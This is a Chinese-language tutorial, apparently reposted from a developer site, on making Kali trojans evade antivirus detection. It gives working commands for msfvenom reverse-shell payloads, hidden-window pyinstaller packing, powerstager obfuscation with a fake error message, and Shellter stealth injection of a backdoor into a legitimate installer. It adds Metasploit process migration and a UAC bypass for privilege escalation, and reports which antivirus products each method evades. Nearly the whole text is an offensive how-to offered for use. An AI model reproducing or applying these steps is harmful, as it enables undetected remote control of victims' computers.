概述
由于现在版本的木马查杀工具更新之快,木马在计算机上基本是裸奔的,再好的免杀技术也逃不过工具的查杀,下面是我研究很久的本地木马免杀,基本都是网上的百度总结,把可以是实现免杀的木马生成进行了总结。
免杀成功1(由于使用的是python载荷,由于权限问题,部分命令不可用)
使用pyinstall,先生成py再转换成exe文件
1.生成py文件
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.137.44 lport=4444 -f raw -o shell.py把py文件导入到windows机器,此处略去了环境的配置,百度pyinstaller的安装和使用后看第二步。
2.使用pypinsatller(使用pip安装)转换成exe文件,使用时需进入到Script目录下
- Script目录下
命令
生成exe文件时建议使用以下命令(参数解释:-F为打包一个py文件,-w为执行时隐藏窗口)
./pyinstaller.exe -F -w ./shell.py显示successfully就表示转换成exe文件成功
免杀成功2
利用powerstager制作免杀木马
(1)python 工具
apt-get install python3apt-get install mingw-w64因缺少names包,需安装pip再安装names包
apt-get install python3-pippip3 install names(2)先克隆再安装
git clone https://github.com/z0noxz/powerstagercd powerstagersudo ./setup.py install
win32:命令一样,下面的win64改成win32就可
win64:
python3 powerstager.py -m -t win64 --lhost=192.168.0.104 --lport=4444 -o /root/桌面/test.exe –obfuscation –fake-error=”error:The program terminated due to an error”
(我感觉上面的几个属性标签没啥卵用啊)
免杀效果:
very important:msf载荷使用 windows/x64/meterpreter/reverse_tcp
ps:(若无法运行powerstager则需要安装wine64,可以运行此步骤可直接省略)
安装wine 64:
sudo dpkg --add-architecture i386sudo apt-get update sudo apt-get install wine:i386sudo apt-get install wine-bin:i386免杀成功3
shelter免杀(只能过火绒和腾讯电脑管家,360动态查杀掉)
shelter仅支持绑定32位的程序,使用nppinstaller.exe作为木马程序
- 安装shellter
apt-get updateapt-get install shellter插件安装:
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
- 启动并使用
启动:进入安装目录,窗口输入shellter即可启动
使用:
(选择模式 A 自动模式自动注入后门,M高级模式,H帮助)
输入A
PE Target:程序路径
是否启动隐身模式:Y
、
设置payload,先输入L选择payload,然后再输入攻击机ip和端口
使用进程迁移来解决点击错误信息后断连情况(可自行百度msf进程迁移)
以下两种进程迁移选择其一即可,上为指定进程迁移,下为自动的进程迁移,默认迁移到notepad.exe。
set autorunscript migrate -n explorer.exeset autorunscript -f
攻击成功后的权限提升
Msf绕过uac提升权限
- 更换渗透模块
use exploit/windows/local/bypassuac
- 设置session
2.提高权限
最后
以上就是知性睫毛为你收集整理的Kali木马免杀,权限提升(kali本地木马免杀)的全部内容,希望文章能够帮你解决Kali木马免杀,权限提升(kali本地木马免杀)所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
发表评论 取消回复